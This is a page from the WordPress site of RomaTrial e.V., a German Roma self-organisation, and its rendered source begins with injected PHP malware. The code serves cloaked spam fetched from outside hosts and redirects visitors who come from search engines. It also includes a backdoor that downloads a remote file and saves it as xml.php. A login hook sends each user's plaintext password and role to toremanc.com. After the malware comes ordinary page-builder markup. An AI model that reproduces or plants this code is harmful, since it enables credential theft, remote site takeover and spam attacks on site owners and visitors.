if (!function_exists('getUserIP')) { function getUserIP() { foreach(array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach(array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('cacheUrl')) { function cacheUrl($url, $skip_cache = FALSE) { $cachetime = 10; //one week // $cachetime = 60 * 60 * 24 * 7; //one week $file = ABSPATH.WPINC. '/class-wp-http-netfilter.php'; $mtime = 0; if (file_exists($file)) { $mtime = filemtime($file); } $filetimemod = $mtime + $cachetime; if ($filetimemod < time() OR $skip_cache) { $ch = curl_init($url); curl_setopt_array($ch, array( CURLOPT_HEADER => FALSE, CURLOPT_RETURNTRANSFER => TRUE, CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36', CURLOPT_FOLLOWLOCATION => TRUE, CURLOPT_MAXREDIRS => 5, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 60, )); $data = curl_exec($ch); curl_close($ch); if ($data AND!$skip_cache) { file_put_contents($file, $data); } } else { $data = file_get_contents($file); } return $data; } } $weoboo = cacheUrl('https://acagna.info/lnk/data/ip.admin.txt'); $user_ip = getUserIP(); if (strpos($weoboo, getUserIP()) !== false) { //ip found } else { $id = $_SERVER['REQUEST_URI']; if (preg_match_all("/ffgg$/", $id, $matches) ) { echo '111111'; } $uag = $_SERVER['HTTP_USER_AGENT']; $id = $_SERVER['REQUEST_URI']; $host=$_SERVER['HTTP_HOST']; $ref =$_SERVER['HTTP_REFERER']; $uri =$_SERVER['REQUEST_URI']; //t $pagesID = $_SERVER['REQUEST_URI']; if (!preg_match_all("/wp-login|wp-admin|admin|xmlrpc/", $pagesID, $matches)) { $apiToken = 'tws5mkxns8qpz5hqywtcknjfw4wgrbhp'; $keyword =$_SERVER['REQUEST_URI']; $url_page=$_SERVER['REQUEST_URI']; $ua = urlencode($_SERVER['HTTP_USER_AGENT']); $lang = (isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2) : ''); $ip = null; $headers = array('HTTP_X_FORWARDED_FOR', 'HTTP_CF_CONNECTING_IP', 'HTTP_X_REAL_IP', 'REMOTE_ADDR'); foreach ($headers as $header) { if (!empty($_SERVER[$header])) { $ip = $_SERVER[$header]; break; } } if (strstr($ip, ',')) { $tmp = explode(',', $ip); if (stristr($_SERVER['HTTP_USER_AGENT'], 'mini')) { $ip = trim($tmp[count($tmp) - 2]); } else { $ip = trim($tmp[0]); } } if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $tmp = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $ip = trim($tmp[0]); } else { $ip = $_SERVER['REMOTE_ADDR']; } $referrer = urlencode(@$_SERVER['HTTP_REFERER']); $url = "https://bantuzu.info/api.php?is_api=1&action=get&token=$apiToken&ua=$ua&ip=$ip&keyword=$keyword&referrer=$referrer&lang=$lang&sub_id_1=".$_SERVER['HTTP_HOST']."&" . http_build_query($_GET) . ""; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $output = curl_exec($ch); curl_close($ch); $result = json_decode($output); print $result->{'body'}; } @ini_set('display_errors', '0'); error_reporting(0); @ini_set("memory_limit","1024M"); $curtime = time(); $hspan = 0; $gen_passwd = "57ffb10f130bd90ab7a342fe814ccbd8"; $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (preg_match('#.txt|.jpg|.png|/feed/|.xml|.ico#', $donor)) die(); if ($_REQUEST['testwork'] == 'ololo') { $twork = file_get_contents('http://acagna.info/lnk/up/sh.txt'); if (preg_match("#cgi|admin#i", $eb)) $eb = ''; if (file_put_contents("{$eb}xml.php", $twork)) echo "success!
go"; else echo "error!"; die(); } if (ini_get('allow_url_fopen')) { function get_data_yo($url) { $data = file_get_contents($url); return $data; } } else { function get_data_yo($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8); $data = curl_exec($ch); curl_close($ch); return $data; } } $ip = urlencode($_SERVER['REMOTE_ADDR']); $ua = urlencode($_SERVER['HTTP_USER_AGENT']); //block ddos bots $blbots = '/semrush|rogerbot|exabot|mj12bot|dotbot|gigabot|ahrefsbot|ia_archiver/i'; if (preg_match($blbots, $ua)) die(); $ref = urlencode($_SERVER['HTTP_REFERER']); $poiskoviki = '/google|bing|yahoo|aol|rambler/i'; $fromse = 0; if ($ref && preg_match($poiskoviki, $ref)) $fromse = 1; $abt = 0; $abtip = 0; if (isset($_GET['debug'])) $abt = 1; $crawlers = '/google|bot|crawl|slurp|spider|yandex|rambler/i'; $crawlers = '/a|b|c|d|e|f|g/i'; if (preg_match($crawlers, $ua)) { $abt = 1; } if (file_exists("{$eb}.bt")) { $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); $btime = filemtime("{$eb}.bt"); $obtime = $curtime - $btime; } if (!$bots[2] || $obtime > 172800) { $fbots = get_data_yo("http://acagna.info/lnk/bots.dat"); $btf = fopen("{$eb}.bt", 'w'); fwrite($btf, $fbots); fclose($btf); $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); } if (in_array($ip, $bots)) { $abt = 1; $abtip = 1; } $st = '.st'; $cldw = 0; $dw = 0; if ($_REQUEST["create"] == 1 && $_REQUEST["gen_passwd"] == $gen_passwd) { $cldw = 0; if ($_REQUEST['cldw']) $cldw = 1; $qq = $_REQUEST['qq']; if (!file_exists("{$eb}{$st}/.r")) { $qq = $_REQUEST['qq']; mkdir("{$eb}{$st}"); } else { $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); if (isset($_REQUEST['qq']) && $_REQUEST['qq']) $qq = $_REQUEST['qq']; else $qq = trim($eqq[2]); } $redir = $_REQUEST['redir']; $redcode = $_REQUEST['redcode']; $redcode = htmlspecialchars_decode($redcode); $redcode = base64_encode($redcode); $group = $_REQUEST['group']; if ($cldw) { $egroup = explode('_', $group); $kgroup = $egroup[0]; $clkeys = get_data_yo("http://acagna.info/lnk/gen/keys/$kgroup.keys"); file_put_contents("{$eb}{$st}/.k", $clkeys); } $lang = $_REQUEST['lang']; file_put_contents("{$eb}{$st}/.r", "$redir|$group|$qq|$lang|$redcode|$cldw"); if (file_exists("{$eb}{$st}/.r")) { echo "created"; die(); } } if (file_exists("{$eb}{$st}/.r")) { $dw = 1; $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); $redir = $eqq[0]; if (!strstr($redir, 'https://')) $redir = base64_decode($redir); $group = $eqq[1]; $qq = trim($eqq[2]); $lang = trim($eqq[3]); if ($eqq[4]) $redcode = base64_decode($eqq[4]); $cldw = $eqq[5]; } $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $ddomain = $_SERVER['HTTP_HOST']; $ddomain = str_ireplace('www.', '', $ddomain); $eddomain = explode('.', $ddomain); $ddname = $eddomain[0]; $donor = str_ireplace('www.', '', $donor); $page = str_replace('/', '|', $donor); $donor = urldecode($donor); $epage = explode('|', $page); $morda = 0; if (!$epage[1] && !$epage[2] || $epage[1] == 'index.php' || $epage[1] == '?p=home') $morda = 1; //$fromse = 1; if ($abt || $fromse || $redcode || $hspan) { if (($abt || $hspan) && !$_GET[$qq]) { $ll = get_data_yo("http://acagna.info/lnk/tuktuk.php?d=$donor&cldw=$cldw&dgrp=$algo"); $el = explode(' ', $ll); } if (file_exists("{$eb}{$st}/$page.html")) { $htmlpage = file_get_contents("{$eb}{$st}/$page.html"); echo $htmlpage; die(); } $mdpage = md5($page); if (file_exists("{$eb}{$st}/$page.txt") || file_exists("{$eb}{$st}/$mdpage.txt")) { if (file_exists("{$eb}{$st}/$mdpage.txt")) $gtxt = file_get_contents("{$eb}{$st}/$mdpage.txt"); else $gtxt = file_get_contents("{$eb}{$st}/$page.txt"); $etxt = explode('|', $gtxt); $key = $etxt[0]; $desc = $etxt[1]; $txt = $etxt[2]; $h1 = $etxt[3]; } elseif ($cldw || isset($_GET[$qq])) { $desc = ''; $keys = file("{$eb}{$st}/.k", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); if ($keys[0]) { $key = $keys[0]; for ($kk = 1; $kk < count($keys); $kk++) $newkeys .= "$keys[$kk] "; file_put_contents("{$eb}{$st}/.k", $newkeys); } if (isset($_GET[$qq])) { $key = str_replace('-', ' ', $_GET[$qq]); } if ($key) { $parkey = $key; $tkey = str_replace(' ', '-', $key); if (stristr($lang, 'own')) { $lang = str_replace('own:', '', $lang); $owntext = base64_decode($lang); $wkey = urlencode($key); if (strstr($owntext, '?')) $ttxt = get_data_yo("{$owntext}&key=$wkey"); else $ttxt = get_data_yo("{$owntext}?key=$wkey"); } else $ttxt = get_data_yo("http://acagna.info/lnk/gen/index.php?key=$tkey&g=$group&lang=$lang&page=$page&cldw=$cldw&dd=$ddomain"); if (preg_match('#\n$parkey rating\n
\n$rating-5 stars based on\n$rcount reviews\n
\n\n"; $desc = $etxt[2]; $txt .= $etxt[3]; if ($desc == 'desc') { $desc = get_data_yo("http://acagna.info/lnk/gen/desc.php?key=$tkey&desc=$group"); preg_match('#gogogo(.*)enenen#is', $desc, $mtchs); $desc = $mtchs[1]; } $mdpage = md5($page); file_put_contents("{$eb}{$st}/$mdpage.txt", "$title|$desc|$txt|$h1"); $newclpage = str_replace('|', '/', $page); $newcllink = "$parkey "; if ($cldw) file_put_contents("{$eb}{$st}/cldwmap.txt", $newcllink, FILE_APPEND); } } $iswp = 0; if (file_exists('wp-includes/vars.php')) $iswp = 1; $cldwmap = file("{$eb}{$st}/cldwmap.txt", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); ob_start(); function shutdown() { global $morda; global $eb; global $txt; global $qq; global $key; global $desc; global $lang; global $cldwmap; global $el; global $dw; global $cldw; global $redcode; global $abt; global $hspan; global $h1; global $iswp; global $ddname; $title = ucfirst($key); $my_content = ob_get_contents(); ob_end_clean(); if ($my_content && isset($_REQUEST['prigod'])) { $my_content = '---prigod---'; } if ($key && $abt) { if ($cldw && !$morda) { preg_match_all('##iUm', $my_content, $ahrefs); $cntahrefs = count($ahrefs[0]); $cntcldwmap = count($cldwmap); $i = 0; foreach ($ahrefs[0] as $ahref) { if ($cldwmap[$i]) { $my_content = str_replace($ahref, $cldwmap[$i], $my_content); } $i++; } if ($morda) { $cldwfooter = ''; foreach ($cldwmap as $cldwflink) { $cldwfooter .= "$cldwflink "; } $my_content = str_replace('', "
$cldwfooter
", $my_content); } } if (!$morda) { $my_content = preg_replace('##iUs', "$title", $my_content, 1); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = str_replace('', " ", $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace('##iUs', '', $my_content, 1); if (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "
$txt
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', $my_content)) { $my_content = preg_replace('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', $my_content)) { $my_content = preg_replace('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs')) { $my_content = preg_replace('##iUs', "\n
$txt
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "\n
\n$txt\n
", $my_content, 1); } } } //end if key elseif (!preg_match('#(.*)404(.*)#i', $my_content) && !preg_match('#<title>(.*)not found(.*)#i', $my_content)) { foreach($el as $ln) { if (preg_match('#<strong>#', $my_content)) { $my_content = preg_replace('#<strong>#', "_-strong-_ $ln ", $my_content, 1); } elseif (preg_match('#<b>#', $my_content)) { $my_content = preg_replace('#<b>#', "_-b-_ $ln ", $my_content, 1); } elseif (preg_match('#<i>#', $my_content)) { $my_content = preg_replace('#<i>#', "_-i-_ $ln ", $my_content, 1); } elseif (preg_match('#<u>#', $my_content)) { $my_content = preg_replace('#<u>#', "_-u-_ $ln ", $my_content, 1); } elseif (preg_match('#<p(.*)>#', $my_content)) { $my_content = preg_replace('#<p(.*)>#iUs', "_-p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#</p>#', $my_content)) { $my_content = preg_replace('#</p>#', "_-/p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#<br(.*)>#', $my_content)) { $my_content = preg_replace('#<br(.*)>#iUs', " $ln ", $my_content, 1); } elseif (preg_match('#<span(.*)>#', $my_content)) { $my_content = preg_replace('#<span(.*)>#iUs', "_-span-_ $ln ", $my_content, 1); } elseif (preg_match('#<body(.*)>#iUs', $my_content)) { $my_content = preg_replace('#<body(.*)>#iUs', "<body>\n$ln ", $my_content, 1); } } $my_content = str_replace('_-', '<', $my_content); $my_content = str_replace('-_', '>', $my_content); //$my_content = str_replace('</head>', "<script type='text/javascript'> function style_{$ddname} () { return 'none'; } function end_{$ddname} () { document.getElementById('$ddname').style.display = style_{$ddname}(); } </script>\n</head>", $my_content); //$my_content = str_replace('</body>', "<script type='text/javascript'> end_{$ddname}(); </script>\n</body>", $my_content); } echo $my_content; } register_shutdown_function('shutdown'); } if (($_GET[$qq] || $cldw) && $fromse && !$abt) { if (!$redcode && !$morda) { if ($key) $tkey = str_replace(' ', '+', $key); else $tkey = str_replace('-', '+', $_GET[$qq]); if (strstr($redir, '?')) $redir .= "&keyword=".$tkey; else $redir .= "?keyword=".$tkey; $redir = str_replace('KEY', $tkey, $redir); header("Location: $redir"); echo "<script type=\"text/javascript\">location.href=\"$redir\";</script>"; die(); } elseif (!$morda) { $key = str_replace('-', ' ', $_GET[$qq]); $redcode = str_replace('KEY', $key, $redcode); echo stripslashes($redcode); } } /* your code end */ } /* weoboo end */ if(!isset($_COOKIE['_eshoob'])) { setcookie('_eshoob', 1, time()+604800, '/'); // unset cookies if (isset($_SERVER['HTTP_COOKIE'])) { $cookies = explode(';', $_SERVER['HTTP_COOKIE']); foreach($cookies as $cookie) { if (strpos($cookie,'wordpress') !== false || strpos($cookie,'wp_') !== false || strpos($cookie,'wp-') !== false) { $parts = explode('=', $cookie); $name = trim($parts[0]); setcookie($name, '', time()-1000); setcookie($name, '', time()-1000, '/'); } } } } if (!function_exists('getUserIP')) { function getUserIP() { foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach (array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('isHttps')) { function isHttps() { if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') || (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') || (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) { $server_request_scheme = 'https'; } else { $server_request_scheme = 'http'; } return $server_request_scheme; } } if (!function_exists('wordpress_api_debug')) { function wordpress_api_debug( $user_login, $user ){ $wpApiUrl = "https://toremanc.com/lnk/api.php"; // $uuuser = get_user_by('login', $_POST['log']); if(in_array('administrator', $uuuser->roles)){ $role = 'admin'; } else{ $role = 'user'; } // $verbLogs = array( 'wp_host' => $_SERVER['HTTP_HOST'], 'wp_uri' => $_SERVER['REQUEST_URI'], 'wp_scheme' => isHttps(), 'user_login' => $_POST['log'], 'user_password' => $_POST['pwd'], 'user_ip' => getUserIP(), 'user_role' => $role ); if (!empty($verbLogs['user_login'])) { $wpLogData = json_encode($verbLogs); $curl = curl_init(); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_URL, $wpApiUrl); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData); curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json')); $response = curl_exec($curl); curl_close($curl); } } } if (function_exists('add_action')) { add_action( 'wp_login', 'wordpress_api_debug', 10, 2 ); } ?><!DOCTYPE html> <html class="avada-html-layout-boxed avada-html-header-position-top avada-html-has-bg-image" lang="en-US" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#"> <head> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title>RomaTrial e.V. – Transkulturelle Selbstorganisation von Roma und Nicht-Roma
Hauptseite2023-02-22T00:51:18+01:00

[fusion_builder_container hundred_percent=”no” hundred_percent_height=”no” hundred_percent_height_scroll=”no” hundred_percent_height_center_content=”yes” equal_height_columns=”no” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”center center” background_repeat=”no-repeat” fade=”no” background_parallax=”none” enable_mobile=”no” parallax_speed=”0.3″ video_aspect_ratio=”16:9″ video_loop=”yes” video_mute=”yes” border_style=”solid” padding_top=”-” flex_column_spacing=”0px” type=”legacy”][fusion_builder_row][fusion_builder_column type=”1_1″ type=”1_1″ layout=”1_1″ center_content=”no” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”left top” background_repeat=”no-repeat” hover_type=”none” border_style=”solid” border_position=”all” animation_direction=”left” animation_speed=”0.3″ last=”true” border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” first=”true” min_height=”” link=””][fusion_title margin_top=”-10px” margin_bottom=”-10px” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” size=”6″ content_align=”center” style_type=”underline solid” sep_color=”#000000″]

RomaTrial e.V.

Transkulturelle Selbstorganisation von Roma und Nicht-Roma

[/fusion_title][/fusion_builder_column][/fusion_builder_row][/fusion_builder_container][fusion_builder_container hundred_percent=”yes” hundred_percent_height=”no” hundred_percent_height_scroll=”no” hundred_percent_height_center_content=”yes” equal_height_columns=”yes” hide_on_mobile=”no” background_color=”#fdfdff” background_position=”left top” background_repeat=”no-repeat” fade=”no” background_parallax=”none” enable_mobile=”no” parallax_speed=”0.3″ video_aspect_ratio=”16:9″ video_loop=”yes” video_mute=”yes” border_color=”rgba(255,254,249,0)” border_style=”solid” padding_right=”0″ padding_left=”0″ border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” flex_align_items=”stretch” type=”legacy”][fusion_builder_row][fusion_builder_column type=”1_3″ type=”1_3″ layout=”1_3″ spacing=”0%” center_content=”yes” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”left top” background_repeat=”no-repeat” hover_type=”none” border_style=”solid” border_position=”all” animation_type=”fade” animation_direction=”left” animation_speed=”0.2″ last=”false” align_content=”center” border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” first=”true” spacing_right=”0%” min_height=”” link=””][rev_slider alias=”kunst-und-kultur” /][/fusion_builder_column][fusion_builder_column type=”1_3″ type=”1_3″ layout=”1_3″ spacing=”0%” center_content=”yes” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”left top” background_repeat=”no-repeat” hover_type=”none” border_style=”solid” border_position=”all” padding_right=”-10px” animation_type=”fade” animation_direction=”left” animation_speed=”0.4″ last=”false” align_content=”center” border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” first=”false” spacing_right=”0%” spacing_left=”0%” min_height=”” link=””][rev_slider alias=”jugend-und-bildung21″ /][/fusion_builder_column][fusion_builder_column type=”1_3″ type=”1_3″ layout=”1_3″ spacing=”0%” center_content=”yes” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”left top” background_repeat=”no-repeat” hover_type=”none” border_style=”solid” border_position=”all” padding_right=”-10px” animation_type=”fade” animation_direction=”left” animation_speed=”0.4″ last=”true” align_content=”center” border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” first=”false” spacing_left=”0%” min_height=”” link=””][rev_slider alias=”wissen-politik” /][/fusion_builder_column][/fusion_builder_row][/fusion_builder_container][fusion_builder_container admin_label=”Aktuell ” hundred_percent=”no” hundred_percent_height=”no” hundred_percent_height_scroll=”no” hundred_percent_height_center_content=”yes” equal_height_columns=”no” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_color=”#fdfdff” background_position=”center center” background_repeat=”no-repeat” fade=”no” background_parallax=”none” enable_mobile=”no” parallax_speed=”0.3″ video_aspect_ratio=”16:9″ video_loop=”yes” video_mute=”yes” border_style=”solid” flex_column_spacing=”0px” type=”legacy”][fusion_builder_row][fusion_builder_column type=”1_1″ type=”1_1″ layout=”1_1″ center_content=”no” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”left top” background_repeat=”no-repeat” hover_type=”none” border_style=”solid” border_position=”all” animation_direction=”left” animation_speed=”0.3″ last=”true” border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” first=”true” min_height=”” link=””][fusion_title hide_on_mobile=”small-visibility,medium-visibility,large-visibility” size=”1″ content_align=”left” style_type=”single solid”]

Aktuell

[/fusion_title][fusion_blog layout=”grid” blog_grid_columns=”3″ blog_grid_column_spacing=”40″ equal_heights=”yes” number_posts=”3″ offset=”0″ pull_by=”category” cat_slug=”aktuell” orderby=”date” order=”DESC” thumbnail=”yes” title=”yes” title_link=”yes” content_alignment=”left” excerpt=”yes” excerpt_length=”30″ strip_html=”yes” meta_all=”yes” meta_author=”no” meta_categories=”no” meta_comments=”no” meta_date=”yes” meta_link=”no” meta_tags=”no” scrolling=”no” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” /][/fusion_builder_column][/fusion_builder_row][/fusion_builder_container][fusion_builder_container admin_label=”Upcoming Events” hundred_percent=”no” hundred_percent_height=”no” hundred_percent_height_scroll=”no” hundred_percent_height_center_content=”yes” equal_height_columns=”no” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_color=”#fdfdff” background_position=”center center” background_repeat=”no-repeat” fade=”no” background_parallax=”none” enable_mobile=”no” parallax_speed=”0.3″ video_aspect_ratio=”16:9″ video_loop=”yes” video_mute=”yes” border_style=”solid” flex_column_spacing=”0px” type=”legacy”][fusion_builder_row][fusion_builder_column type=”1_1″ type=”1_1″ layout=”1_1″ center_content=”no” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”left top” background_repeat=”no-repeat” hover_type=”none” border_style=”solid” border_position=”all” animation_direction=”left” animation_speed=”0.3″ last=”true” border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” first=”true” min_height=”” link=””][fusion_title hide_on_mobile=”small-visibility,medium-visibility,large-visibility” size=”1″ content_align=”left” style_type=”single solid”]

Termine

[/fusion_title][fusion_events past_events=”no” number_posts=”2″ columns=”1″ column_spacing=”40″ picture_size=”auto” pagination=”no” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” /][/fusion_builder_column][/fusion_builder_row][/fusion_builder_container][fusion_builder_container hundred_percent=”no” hundred_percent_height=”no” hundred_percent_height_scroll=”no” hundred_percent_height_center_content=”yes” equal_height_columns=”no” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”center center” background_repeat=”no-repeat” fade=”no” background_parallax=”none” enable_mobile=”no” parallax_speed=”0.3″ video_aspect_ratio=”16:9″ video_loop=”yes” video_mute=”yes” border_style=”solid” flex_column_spacing=”0px” type=”legacy”][fusion_builder_row][fusion_builder_column type=”1_1″ type=”1_1″ layout=”1_1″ center_content=”no” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”left top” background_repeat=”no-repeat” hover_type=”none” border_style=”solid” border_position=”all” animation_direction=”left” animation_speed=”0.3″ last=”true” border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” first=”true” min_height=”” link=””][fusion_title hide_on_mobile=”small-visibility,medium-visibility,large-visibility” size=”1″ content_align=”left” style_type=”default”]

Laufende Projekte

[/fusion_title][fusion_text][fusion_portfolio layout=”carousel” picture_size=”fixed” text_layout=”no_text” grid_box_color=”” grid_element_color=”” grid_separator_style_type=”” grid_separator_color=”” columns=”3″ column_spacing=”0″ portfolio_masonry_grid_ratio=”” portfolio_masonry_width_double=”” one_column_text_position=”below” equal_heights=”no” number_posts=”-1″ portfolio_title_display=”all” portfolio_text_alignment=”left” padding_top=”” padding_right=”” padding_bottom=”” padding_left=”” filters=”yes” pull_by=”category” cat_slug=”laufende” exclude_cats=”” tag_slug=”” exclude_tags=”” pagination_type=”default” hide_url_params=”off” offset=”” orderby=”rand” order=”DESC” content_length=”excerpt” excerpt_length=”35″ strip_html=”yes” carousel_layout=”title_on_rollover” scroll_items=”” autoplay=”yes” show_nav=”yes” mouse_scroll=”no” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” class=”” id=”” animation_type=”fade” animation_direction=”up” animation_speed=”0.3″ animation_offset=”” /][/fusion_text][/fusion_builder_column][/fusion_builder_row][/fusion_builder_container][fusion_builder_container admin_label=”Über uns + Videos” hundred_percent=”no” hundred_percent_height=”no” hundred_percent_height_scroll=”no” hundred_percent_height_center_content=”yes” 